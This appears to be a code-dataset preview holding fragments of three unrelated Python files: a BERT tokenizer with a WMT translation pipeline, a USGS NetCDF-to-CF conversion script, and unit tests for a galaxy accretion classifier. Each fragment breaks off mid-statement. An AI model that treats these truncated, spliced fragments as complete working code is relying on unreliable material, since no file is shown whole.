input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<reponame>gottaegbert/penter
import tensorflow as tf
import tensorflow_datasets as tfds
import collections
import unicodedata
import os,sys
import numpy as np
def convert_to_unicode(text):
    """Return `text` as a unicode string, decoding utf-8 bytes if needed.

    Raises:
        ValueError: if `text` is neither `str` nor `bytes`.
    """
    if isinstance(text, bytes):
        # Invalid byte sequences are silently dropped.
        return text.decode("utf-8", "ignore")
    if isinstance(text, str):
        return text
    raise ValueError("Unsupported string type: %s" % (type(text)))
def load_vocab(vocab_file):
    """Read `vocab_file` line by line into an ordered token -> id mapping."""
    vocab = collections.OrderedDict()
    with tf.io.gfile.GFile(vocab_file, "r") as reader:
        next_id = 0
        while True:
            raw = convert_to_unicode(reader.readline())
            if not raw:
                # readline() returns "" only at end of file.
                return vocab
            vocab[raw.strip()] = next_id
            next_id += 1
def whitespace_tokenize(text):
    """Strip `text` and split it on runs of whitespace; [] for blank input."""
    cleaned = text.strip()
    return cleaned.split() if cleaned else []
def convert_by_vocab(vocab, items):
    """Map each element of `items` (tokens or ids) through `vocab`.

    Raises KeyError for items missing from the vocab, as the original did.
    """
    return [vocab[item] for item in items]
class FullTokenizer(object):
    """End-to-end tokenizer: basic tokenization followed by WordPiece."""

    def __init__(self, vocab_file, do_lower_case=True):
        """Load the vocab and build the basic and wordpiece sub-tokenizers."""
        self.vocab = load_vocab(vocab_file)
        # id -> token reverse lookup for decoding.
        self.inv_vocab = dict((idx, tok) for tok, idx in self.vocab.items())
        self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
        self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)

    def tokenize(self, text):
        """Basic-tokenize `text`, then wordpiece-split every resulting token."""
        return [
            piece
            for word in self.basic_tokenizer.tokenize(text)
            for piece in self.wordpiece_tokenizer.tokenize(word)
        ]

    def convert_tokens_to_ids(self, tokens):
        """Map token strings to vocabulary ids."""
        return convert_by_vocab(self.vocab, tokens)

    def convert_ids_to_tokens(self, ids):
        """Map vocabulary ids back to token strings."""
        return convert_by_vocab(self.inv_vocab, ids)
class BasicTokenizer(object):
    """Runs basic tokenization (punctuation splitting, lower casing, etc.)."""

    def __init__(self, do_lower_case=True):
        """Constructs a BasicTokenizer.

        Args:
          do_lower_case: Whether to lower case the input.
        """
        self.do_lower_case = do_lower_case

    def tokenize(self, text):
        """Tokenizes a piece of text into a list of basic (pre-WordPiece) tokens."""
        text = convert_to_unicode(text)
        text = self._clean_text(text)
        # This was added on November 1st, 2018 for the multilingual and Chinese
        # models. This is also applied to the English models now, but it doesn't
        # matter since the English models were not trained on any Chinese data
        # and generally don't have any Chinese data in them (there are Chinese
        # characters in the vocabulary because Wikipedia does have some Chinese
        # words in the English Wikipedia.).
        text = self._tokenize_chinese_chars(text)
        orig_tokens = whitespace_tokenize(text)
        split_tokens = []
        for token in orig_tokens:
            if self.do_lower_case:
                token = token.lower()
                # Accents are stripped only on the lower-cased path.
                token = self._run_strip_accents(token)
            split_tokens.extend(self._run_split_on_punc(token))
        # Re-join and re-split on whitespace to flatten the token list.
        output_tokens = whitespace_tokenize(" ".join(split_tokens))
        return output_tokens

    def _run_strip_accents(self, text):
        """Strips accents from a piece of text."""
        # NFD decomposition separates base characters from combining marks.
        text = unicodedata.normalize("NFD", text)
        output = []
        for char in text:
            cat = unicodedata.category(char)
            if cat == "Mn":
                # Drop nonspacing combining marks (the accents themselves).
                continue
            output.append(char)
        return "".join(output)

    def _run_split_on_punc(self, text):
        """Splits punctuation on a piece of text.

        Each punctuation character becomes its own token; runs of
        non-punctuation characters stay together.
        """
        chars = list(text)
        i = 0
        start_new_word = True
        output = []  # list of char-lists, joined into strings at the end
        while i < len(chars):
            char = chars[i]
            if _is_punctuation(char):
                output.append([char])
                start_new_word = True
            else:
                if start_new_word:
                    output.append([])
                start_new_word = False
                output[-1].append(char)
            i += 1
        return ["".join(x) for x in output]

    def _tokenize_chinese_chars(self, text):
        """Adds whitespace around any CJK character."""
        output = []
        for char in text:
            cp = ord(char)
            if self._is_chinese_char(cp):
                output.append(" ")
                output.append(char)
                output.append(" ")
            else:
                output.append(char)
        return "".join(output)

    def _is_chinese_char(self, cp):
        """Checks whether CP is the codepoint of a CJK character."""
        # This defines a "chinese character" as anything in the CJK Unicode block:
        # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
        #
        # Note that the CJK Unicode block is NOT all Japanese and Korean characters,
        # despite its name. The modern Korean Hangul alphabet is a different block,
        # as is Japanese Hiragana and Katakana. Those alphabets are used to write
        # space-separated words, so they are not treated specially and handled
        # like the all of the other languages.
        if ((cp >= 0x4E00 and cp <= 0x9FFF) or    # CJK Unified Ideographs
            (cp >= 0x3400 and cp <= 0x4DBF) or    # Extension A
            (cp >= 0x20000 and cp <= 0x2A6DF) or  # Extension B
            (cp >= 0x2A700 and cp <= 0x2B73F) or  # Extension C
            (cp >= 0x2B740 and cp <= 0x2B81F) or  # Extension D
            (cp >= 0x2B820 and cp <= 0x2CEAF) or  # Extension E
            (cp >= 0xF900 and cp <= 0xFAFF) or    # Compatibility Ideographs
            (cp >= 0x2F800 and cp <= 0x2FA1F)):   # Compatibility Supplement
            return True
        return False

    def _clean_text(self, text):
        """Performs invalid character removal and whitespace cleanup on text."""
        output = []
        for char in text:
            cp = ord(char)
            if cp == 0 or cp == 0xfffd or _is_control(char):
                # Drop NUL, the Unicode replacement character, and control chars.
                continue
            if _is_whitespace(char):
                output.append(" ")
            else:
                output.append(char)
        return "".join(output)
class WordpieceTokenizer(object):
    """Runs WordPiece tokenziation."""

    def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
        # Mapping from wordpiece string to id; only membership tests are used here.
        self.vocab = vocab
        # Token emitted for words that cannot be decomposed into vocab pieces.
        self.unk_token = unk_token
        # Words longer than this are mapped straight to `unk_token`.
        self.max_input_chars_per_word = max_input_chars_per_word

    def tokenize(self, text):
        """Tokenizes a piece of text into its word pieces.

        This uses a greedy longest-match-first algorithm to perform tokenization
        using the given vocabulary.

        For example:
          input = "unaffable"
          output = ["un", "##aff", "##able"]

        Args:
          text: A single token or whitespace separated tokens. This should have
            already been passed through `BasicTokenizer`.

        Returns:
          A list of wordpiece tokens.
        """
        text = convert_to_unicode(text)
        output_tokens = []
        for token in whitespace_tokenize(text):
            chars = list(token)
            if len(chars) > self.max_input_chars_per_word:
                # Over-long words are never searched; emit [UNK] directly.
                output_tokens.append(self.unk_token)
                continue
            is_bad = False  # set when some suffix cannot be matched at all
            start = 0
            sub_tokens = []
            while start < len(chars):
                end = len(chars)
                cur_substr = None
                # Shrink the candidate from the right until it is in the
                # vocab (longest-match-first).
                while start < end:
                    substr = "".join(chars[start:end])
                    if start > 0:
                        # Non-initial pieces carry the "##" continuation prefix.
                        substr = "##" + substr
                    if substr in self.vocab:
                        cur_substr = substr
                        break
                    end -= 1
                if cur_substr is None:
                    is_bad = True
                    break
                sub_tokens.append(cur_substr)
                start = end
            if is_bad:
                # The whole word becomes [UNK] if any part failed to match.
                output_tokens.append(self.unk_token)
            else:
                output_tokens.extend(sub_tokens)
        return output_tokens
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
def get_tokenizer(MAX_SEQ_LENGTH, BATCH_SIZE):
# ## Setup input pipleline
# Use TFDS to load the wmt2019 zh-en translation dataset.
if not os.path.exists('chinese_L-12_H-768_A-12'):
# get_ipython().system('wget https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip')
# get_ipython().system('unzip chinese_L-12_H-768_A-12')
print('download pretrained first!')
sys.exit()
config = tfds.translate.wmt.WmtConfig(
description="WMT 2019 translation task dataset.",
version="0.0.3",
language_pair=("zh", "en"),
subsets={
tfds.Split.TRAIN: ["newscommentary_v13"],
tfds.Split.VALIDATION: ["newsdev2017"],
}
)
builder = tfds.builder("wmt_translate", config=config)
print(builder.info.splits)
builder.download_and_prepare()
datasets = builder.as_dataset(as_supervised=True)
print('datasets is {}'.format(datasets))
# In[ ]:
train_examples = datasets['train']
val_examples = datasets['validation']
# In[ ]:
for zh, en in train_examples.take(1):
# print((zh))
print(tf.compat.as_text(zh.numpy()))
print(tf.compat.as_text(en.numpy()))
# Create a custom subwords tokenizer from the training dataset for the decoder.
# In[ ]:
vocab_file = 'vocab_en'
if os.path.isfile(vocab_file + '.subwords'):
tokenizer_en = tfds.features.text.SubwordTextEncoder.load_from_file(vocab_file)
else:
tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(en.numpy() for zh, en in train_examples), target_vocab_size=2 ** 13)
tokenizer_en.save_to_file('vocab_en')
sample_string = 'Transformer is awesome.'
tokenized_string = tokenizer_en.encode(sample_string)
for ts in tokenized_string:
print('{} ----> {}'.format(ts, tokenizer_en.decode([ts])))
# The encoder uses BERT tokenizer.
# In[ ]:
tokenizer_zh = FullTokenizer(
vocab_file='chinese_L-12_H-768_A-12/vocab.txt', do_lower_case=True)
test_tokens = tokenizer_zh.tokenize('今天天气不错额。')
test_ids = tokenizer_zh.convert_tokens_to_ids(['[CLS]'] + test_tokens + ['[SEP]'])
print('tokens:', test_tokens)
print('ids:', test_ids)
print('convert_ids_to_tokens:', tokenizer_zh.convert_ids_to_tokens(test_ids))
def encode(zh, en, seq_length=MAX_SEQ_LENGTH):
tokens_zh = tokenizer_zh.tokenize(tf.compat.as_text(zh.numpy()))
lang1 = tokenizer_zh.convert_tokens_to_ids(['[CLS]'] + tokens_zh + ['[SEP]'])
if len(lang1) < seq_length:
lang1 = lang1 + list(np.zeros(seq_length - len(lang1), 'int32'))
# insert SOS and EOS
lang2 = [tokenizer_en.vocab_size] + tokenizer_en.encode(
tf.compat.as_text(en.numpy())) + [tokenizer_en.vocab_size + 1]
if len(lang2) < seq_length:
lang2 = lang2 + list(np.zeros(seq_length - len(lang2), 'int32'))
return lang1, lang2
def filter_max_length(x, y, max_length=MAX_SEQ_LENGTH):
return tf.logical_and(tf.size(x) <= max_length,
tf.size(y) <= max_length)
train_dataset = train_examples.map(
lambda zh, en: tf.py_function(encode, [zh, en], [tf.int32, tf.int32]))
train_dataset = train_dataset.filter(filter_max_length)
# cache the dataset to memory to get a speedup while reading from it.
train_dataset = train_dataset.cache()
train_dataset = train_dataset.shuffle(20000).padded_batch(
BATCH_SIZE, padded_shapes=([-1], [-1]), drop_remainder=True)
train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
val_dataset = val_examples.map(
lambda zh, en: tf.py_function(encode, [zh, en], [tf.int32, | |
<filename>cmg_ts2cf_loop.py
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <markdowncell>
# #Convert existing time series NetCDF files in 4D (T,Z,Y,X) "grid" format to CF-1.6 format
# <markdowncell>
# All the USGS time series data has traditionally been stored in PMEL EPIC-compliant NetCDF files. These files use EPIC codes for
# <codecell>
import glob
import os
import netCDF4
import StringIO
import pandas as pd
import re
# <codecell>
projs = '''
ARGO_MERCHANT,<NAME>,Argo Merchant Experiment,A moored array deployed after the ARGO MERCHANT ran aground onNantucket Shoals designed to help understand the fate of the spilled oil.
BUZZ_BAY,<NAME>,Currents and Sediment Transport in Buzzards Bay,Investigation of the near-bottom circulation in Buzzards Bay and consequent transport of fine-grained sediments that may be contaminated with PCBs from inner New Bedford Harbor.
CAMP,<NAME>,California Area Monitoring Program (CAMP),A four-year multi-disciplinary field and laboratory study to investigate the sediment transport regime in the vicinity of production drilling rigs in the Santa Barbara Basin
CAPE_COD_BAY,<NAME>,Currents and Sediment Transport in Cape Cod Bay,A pilot study to determine the effect of winter storms on sediment movement at two potential dredge spoil disposal areas.
CC_MISC,<NAME>,Transport studies - Nauset Inlet,Part of a collaborative study of sediment movement in Nauset Inlet.
DEEP_REEF,<NAME>,Gulf of Mexico - Pinnacles,Pressure data from the Gulf of Mexico
DWDS_106,<NAME>,Sediment Transport at Deep Water Dump Site 106,Near-bottom current measurements to understand the fate and transport of sludge from the New York Metropolitan region discharged at the sea surface.
ECOHAB_II,<NAME>,Ecology of Harmful Algal Blooms (ECOHAB-II),A field program to continue investigating the transport and fate of toxic dinoflagellate blooms in the western Gulf of Maine.
ECOHAB_I,<NAME>,Ecology of Harmful Algal Blooms (ECOHAB-I),A field program to study the transport and fate of toxic dinoflagellate blooms in the western Gulf of Maine.
EUROSTRATAFORM,<NAME>,EuroSTRATAFORM,The EuroSTRATAFORM Po and Apennine Sediment Transport and Accumulation (PASTA) experiment was an international study of sediment-transport processes and formation of geological strata in the Adriatic Sea.
FARALLONES,<NAME>,Farallons,Program to measure the currents and circulation on the continental slope off San Francisco CA and thus infer the transport of dredged materialat the newly-established deep-water disposal site.
GB_SED,<NAME>,Georges Bank Current and Sediment Transport Studies,A series of studies to assess environmental hazards to petroleum development in the Georges Bank and New England Shelf region
GLOBEC_GB,<NAME>,GLOBEC Georges Bank Program,A moored array program to investigate the circulation and mixing of plankton on Georges Bank.
GLOBEC_GSC,<NAME>,GLOBEC Great South Channel Circulation Experiment,A moored array program to investigate the recirculation of water and plankton around Georges Bank
GULF_MAINE,<NAME>,Deep Circulation in the Gulf of Maine,A two-year field study to investigate the deep flow between the major basins in the Gulf of Maine and the effects on the distribution of suspended sediments.
HUDSON_SVALLEY,<NAME>,Circulation and Sediment Transport in the Hudson Shelf Valley,Field experiments have been carried out to understand the transport of sediments and associated contaminants in the Hudson Shelf Valley offshore of New York.
KARIN_RIDGE,<NAME>,Karin Ridge Experiment,Current measurements collected at 2 sites in Karin Ridge Seamount.
LYDONIA_C,<NAME>,Lydonia Canyon Dynamics Experiment,A major field experiment to determine the importance of submarine canyons in sediment transport along and across the continental margin.
MAB_SED,<NAME>,Sediment Transport Observations in the Middle Atlantic Bight,A series of studies to assess environmental hazards to petroleum development in the Middle Atlantic Bight.
MAMALA_BAY,<NAME>,Mamala bay Experiment,Current measurements collected at 350-450 meters in Mamala Bay near Waikiki Beach.
MBAY_CIRC,<NAME>, Massachusetts Bay Circulation Experiment,Current measurements collected at 6 sites in Massachusetts Bay throughout the year to map the tidal wind and density driven currents.
MBAY_IWAVE,<NAME>,Massachusetts Bay Internal Wave Experiment,A 1-month 4-element moored array experiment to measure the currents associated with large-amplitude internal waves generated by tidal flow across Stellwagen Bank.
MBAY_LTB,<NAME>,Long-term observations in Massachusetts Bay; Site B-Scituate,Measurements of currents and other oceanographic properties were made to assess the impact of sewage discharge from the proposed outfall site.
MBAY_LT,<NAME>,Long-term observations in Massachusetts Bay; Site A-Boston Harbor,Measurements of currents and other oceanographic properties were made to assess the impact of sewage discharge from the proposed outfall site.
MBAY_STELL,<NAME>,Monitoring on Stellwagen Bank,A year-long series of current measurements on the eastern flank of Stellwagen Bank to document the currents at the mouth of Massachusetts Bay driven by the Maine Coastal current.
MBAY_WEST,<NAME>,Currents and Sediment Transport in Western Massachusetts Bay,A pilot winter-time experiment to investigate circulation and sediment transport. Designed to provide information to aid in citing the new ocean outfall for the Boston sewer system.
MOBILE_BAY,<NAME>,Mobile Bay Study,Measure currents and transport out of Mobile Bay.
MONTEREY_BAY,<NAME>,Monterey Bay National Marine Sanctuary Program,Part of a large multi-disciplinary experiment to characterize the geologic environment and to generate a sediment budget.
MONTEREY_CAN,<NAME>,Monterey Canyon Experiment, A program to determine the mechanisms that govern the circulation within and the transport of sediment and water through Monterey Submarine Canyon.
MYRTLEBEACH,<NAME>,Myrtle Beach Experiment SC,Measurements collected as part of a larger study to understand the physical processes that control the transport of sediments in Long Bay South Carolina.
NE_SLOPE,<NAME>,Currents on the New England Continental Slope,A study designed to describe the currents and to investigate the transport of sediment from the shelf to the slope.
OCEANOG_C,<NAME>,Oceanographer Canyon Dynamics Experiment,A field experiment to determine the importance of submarine canyons in sediment transport along and across the continental margin.
ORANGE_COUNTY,<NAME>,Orange County Sanitation District Studies,Observations to monitor coastal ocean process that transport suspended material and associated comtaminants across the shelf
PONCHARTRAIN,<NAME>,Lake Ponchartrain Project,A series of moored array studies to investigate the circulation and particle transport in Lake Pontchartrain.
PV_SHELF04,<NAME>,Palos Verdes Shelf 2004,Additional observations to estimate the quantity and direction of sediment erosion and transport on the shelf near the White Point ocean outfalls.
PV_SHELF07,<NAME>,Palos Verdes Shelf 2007,Follow-up observations to evaluate how often coastal ocean processes move the DDT contaminated sediments near the White Point ocean outfalls.
PV_SHELF,<NAME>,Palos Verdes Shelf Study,Initial observations of currents and circulation near the White Point ocean outfalls determine how often coastal ocean processes move the DDT contaminated sediments in this region.
SAB_SED,<NAME>,Sediment Transport Observations in the Southern Atlantic Bight,A series of studies to assess environmental hazards to petroleum development in the South Atlantic Bight.
SOUTHERN_CAL,<NAME>,Southern California Project,A series of moorings were deployed to understand how coastal ocean processes that move sediments change with location on the shelf.
STRESS,<NAME>,Sediment Transport on Shelves and Slopes (STRESS),Experiment on the California continental margin to investigate storm-driven sediment transport.
WRIGHTSVILLE,<NAME>,Wrightsville Beach Study, Measurements of bottom currents and waves to investigate the flow field and sediment transport in a rippled scour depression offshore of Wrightsville Beach NC.
DIAMONDSHOALS,<NAME>,Cape Hatteras- Diamond Shoals,This experiment was designed to investigate the ocean circulation and sediment transport dynamics at Diamond Shoals NC.
CHANDELEUR,<NAME>,Chandeleur Islands Oceanographic Measurements,A program to measure waves water levels and currents near the Chandeleur Islands Louisiana and adjacent berm construction site.
WFAL,<NAME>,West Falmouth Harbor Fluxes,Oceanographic and water-quality observations made at six locations in West Falmouth Harbor and Buzzards Bay.
BW2011,<NAME>, Blackwater 2011, Oceanographic and Water-Quality Measurements made at several sites in 2 watersheds in Blackwater National Wildlife Refuge.
MVCO_11,<NAME>, OASIS MVCO 2011, Near-seabed Oceanographic Observations made as part of the 2011 OASIS Project at the MVCO.
HURRIRENE_BB,<NAME>, Observations in Buzzards Bay during and after a Hurricane, Oceanographic data collected in Buzzards Bay MA during Hurricane Irene August 2011.'''
# <codecell>
# Parse the project metadata into a DataFrame keyed by project_id.
# FIX: the separator is a regex, so it must be a raw string -- the original
# ",\s*" relies on "\s" being an unrecognized escape, which raises a
# warning on modern Pythons.  Behavior is unchanged.
project = pd.read_csv(StringIO.StringIO(projs.strip()),
                      sep=r",\s*", index_col='project_id',
                      names=['project_id', 'project_pi', 'project_name', 'project_summary'])
# <codecell>
project.ix['PV_SHELF']
# <codecell>
project.ix['PV_SHELF'].ix['project_pi']
# <codecell>
len(project)
# <codecell>
for index,row in project.iterrows():
print index,row['project_pi']
# <codecell>
""" this is Ellyn's old Matlab code:
function nname=lookup_cf(long_name)
% LOOKUP_CF Get CF equivalent name for EPIC variable long_name
% return the new name string or [] if there's no equivalent
%
if(strfind(lower(long_name),'temp'))
nname='sea_water_temperature';
elseif (strfind(lower(long_name),'cond'))
nname='sea_water_electrical_conductivity';
elseif (strfind(lower(long_name),'sal'))
nname='sea_water_salinity';
elseif (strfind(lower(long_name),'sigma'))
nname='sea_water_sigma_theta';
% also have to deal with the min, max std of vels for burst stats files
elseif (strfind(lower(long_name),'east'))
nname='eastward_sea_water_velocity';
elseif (strfind(lower(long_name),'north'))
nname='northward_sea_water_velocity';
elseif (strfind(lower(long_name),'vertical'))
nname='upward_sea_water_velocity';
elseif (strfind(lower(long_name),'pitch'))
nname='platform_pitch_angle';
elseif (strfind(lower(long_name),'roll'))
nname='platform_roll_angle';
elseif (strfind(lower(long_name),'head'))
nname='platform_orientation';
elseif (strfind(lower(long_name),'pres'))
if ~isempty(strfind(lower(long_name),'dev')) || ~isempty(strfind(lower(long_name),'std'))
nname=[];
else
nname='sea_water_pressure';
end
elseif (strfind(lower(long_name),'cond'))
nname='sea_water_electrical_conductivity';
elseif (strfind(lower(long_name),'speed'))
if (strfind(lower(long_name),'rotor'))
nname=[];
else
nname='sea_water_speed';
end
elseif (strfind(lower(long_name),'direction'))
nname='direction_of_sea_water_velocity';
else
nname=[];
end
disp([long_name ' : ' nname])
""";
# <codecell>
#os.chdir('/usgs/data2/emontgomery/stellwagen/Data/ARGO_MERCHANT')
# Root of the EPIC-style input data tree; odir is where CF-1.6 output goes.
root_dir='/usgs/data2/emontgomery/stellwagen/Data/'
#root_dir='/usgs/data2/emontgomery/stellwagen/Data/MVCO_11'
odir='/usgs/data2/emontgomery/stellwagen/CF-1.6/'
os.chdir(root_dir)
# <codecell>
# now find all the unique names, long_names & units
# Walk the data tree, opening every file as NetCDF and collecting the
# set of variable names and their long_name/units/epic_key attributes.
# FIXES vs. original: datasets are now closed (resource leak), the local
# no longer shadows the `file` builtin, and the bare `except:` clauses
# are narrowed so only the expected failures are swallowed.
names = set()
long_names = set()
units = set()
epic_keys = set()
for path, subdirs, files in os.walk(root_dir):
    for name in files:
        fullname = os.path.join(path, name)
        try:
            nc = netCDF4.Dataset(fullname)
        except Exception:
            # Not a readable NetCDF file -- skip it, as before.
            continue
        try:
            for var in nc.variables.keys():
                names.add(var)
                # Each attribute is optional on any given variable.
                for attr, target in (('long_name', long_names),
                                     ('units', units),
                                     ('epic_key', epic_keys)):
                    try:
                        target.add(getattr(nc.variables[var], attr))
                    except AttributeError:
                        pass  # variable lacks this attribute
        finally:
            nc.close()
# <codecell>
# Materialize the collected sets as lists (iteration order is arbitrary).
names= list(names)
long_names = list(long_names)
units = list(units)
epic_keys = list(epic_keys)
# <codecell>
print len(names)
print | |
1, 1, 1, 1, 1, ], # Always part of main galaxy
[ 0, 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
]).astype( bool )
# Run the function
actual = self.classifier.identify_is_in_main_gal()
npt.assert_allclose( expected, actual )
########################################################################
def test_identify_is_in_main_gal_density_criterion( self ):
    '''Test that we can identify when a particle is in the main galaxy, including a density criterion.

    Columns appear ordered latest -> earliest snapshot.  From the fixture,
    the density cut seems to apply only to gas (PType 0): star particles
    (PType 4) with NaN density are still counted in (row 2), while gas below
    min_gal_density is excluded -- TODO confirm against the implementation.
    '''
    # Change paramters
    self.classifier.min_gal_density = 0.1
    # Test data setup
    self.classifier.is_in_other_gal = np.array([
        [ 0, 1, 1, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 0, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    self.classifier.ptrack['Den'] = np.array([
        [ 0, 0, 0, 0, 0, ], # Merger, except in early snapshots
        [ np.nan, np.nan, 10., 0.01, 0.001, ], # Always part of main galaxy
        [ 0, 0, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ])
    self.classifier.ptrack['PType'] = np.array([
        [ 4, 0, 0, 0, 0, ], # Merger, except in early snapshots
        [ 4, 4, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 4, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ])
    expected = np.array([
        [ 1, 0, 0, 0, 0, ], # Merger, except in early snapshots
        [ 1, 1, 1, 0, 0, ], # Always part of main galaxy
        [ 0, 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    # Run the function
    actual = self.classifier.identify_is_in_main_gal()
    npt.assert_allclose( expected, actual )
########################################################################
def test_calc_gal_event_id( self ):
    '''In this fixture, gal_event_id equals the difference of adjacent
    is_in_main_gal columns: +1 on entry into the main galaxy, -1 on exit,
    0 when membership is unchanged (one fewer column than snapshots).
    '''
    # Prerequisite
    self.classifier.is_in_main_gal = np.array([
        [ 1, 0, 0, 0, 0, ], # Merger, except in early snapshots
        [ 1, 1, 1, 1, 1, ], # Always part of main galaxy
        [ 0, 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    expected_gal_event_id = np.array([
        [ 1, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ -1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
    ])
    # Run the function
    actual = self.classifier.calc_gal_event_id()
    npt.assert_allclose( expected_gal_event_id, actual )
#########################################################################
def test_identify_accretion( self ):
    '''Accretion is expected exactly where gal_event_id == 1, i.e. at the
    snapshot where the particle enters the main galaxy.
    '''
    expected = np.array([
        [ 1, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 1, 0, 0, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    # Get the prerequisites
    self.classifier.gal_event_id= np.array([
        [ 1, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ -1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
    ])
    # Run the function
    actual = self.classifier.identify_accretion()
    npt.assert_allclose( expected, actual )
########################################################################
def test_identify_ejection( self ):
    '''Ejection is expected where gal_event_id == -1 (leaving the main
    galaxy).  is_in_other_gal is supplied all-False, which presumably also
    feeds the criterion -- confirm against the implementation.  Real halo
    data is loaded through the AHF reader as a prerequisite.
    '''
    # Prerequisites
    self.classifier.ahf_reader = read_ahf.AHFReader( default_kwargs['halo_data_dir'] )
    self.classifier.ahf_reader.get_mtree_halos( 'snum' )
    expected = np.array([
        [ 0, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    # Get the prerequisites
    self.classifier.gal_event_id= np.array([
        [ 1, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ -1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
    ])
    self.classifier.is_in_other_gal = np.array([
        [ 0, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ])
    # Run the function
    actual = self.classifier.identify_ejection()
    npt.assert_allclose( expected, actual )
########################################################################
def test_get_cum_num_acc( self ):
    '''Cumulative number of accretion events, accumulated right-to-left
    (from the earliest snapshot column toward the latest).
    '''
    self.classifier.is_accreted = np.array([
        [ 1, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 1, 0, 0, ], # CGM -> main galaxy -> CGM
        [ 1, 0, 1, 0, ], # Accreted twice
    ]).astype( bool )
    actual = self.classifier.get_cum_num_acc()
    expected = np.array([
        [ 1, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
        [ 2, 1, 1, 0, ], # Accreted twice
    ])
    npt.assert_allclose( expected, actual )
########################################################################
def test_get_redshift_first_acc( self ):
    '''Redshift at each particle's first accretion.  -1. is the sentinel
    when no transition exists (mask all-False or all-True).  0.06984665 is
    presumably the snapshot redshift from the test data -- confirm there.
    '''
    self.classifier.is_before_first_acc = np.array([
        [ 0, 1, 1, 1, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 0, 1, 1, ], # CGM -> main galaxy -> CGM
        [ 1, 1, 1, 1, ], # Never accreted
    ]).astype( bool )
    self.classifier.n_particle = 4
    expected = np.array([ 0., -1., 0.06984665, -1. ])
    actual = self.classifier.get_redshift_first_acc()
    npt.assert_allclose( expected, actual )
########################################################################
def test_ind_first_acc( self ):
    '''Index of the first-accretion snapshot: in this fixture it is the
    column immediately before is_before_first_acc first becomes True.
    -99999 appears as the fill value when the mask is all-True or
    all-False (no accretion event to index).
    '''
    self.classifier.is_before_first_acc = np.array([
        [ 0, 1, 1, 1, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 0, 1, 1, ], # CGM -> main galaxy -> CGM
        [ 1, 1, 1, 1, ], # Never accreted
    ]).astype( bool )
    self.classifier.n_particle = 4
    expected = np.array([ 0, -99999, 1, -99999 ])
    actual = self.classifier.ind_first_acc
    npt.assert_allclose( expected, actual )
########################################################################
def test_identify_is_before_first_acc( self ):
    '''From the fixture, a snapshot is "before first accretion" when the
    cumulative accretion count is zero AND the particle is not in the main
    galaxy at that snapshot (row 2 is all-zero despite zero accretions).
    '''
    # Prerequisites
    self.classifier.cum_num_acc = np.array([
        [ 1, 0, 0, 0, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 1, 1, 0, 0, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    self.classifier.is_in_main_gal = np.array([
        [ 1, 0, 0, 0, 0, ], # Merger, except in early snapshots
        [ 1, 1, 1, 1, 1, ], # Always part of main galaxy
        [ 0, 1, 0, 0, 0, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
    expected = np.array([
        [ 0, 1, 1, 1, ], # Merger, except in early snapshots
        [ 0, 0, 0, 0, ], # Always part of main galaxy
        [ 0, 0, 1, 1, ], # CGM -> main galaxy -> CGM
    ]).astype( bool )
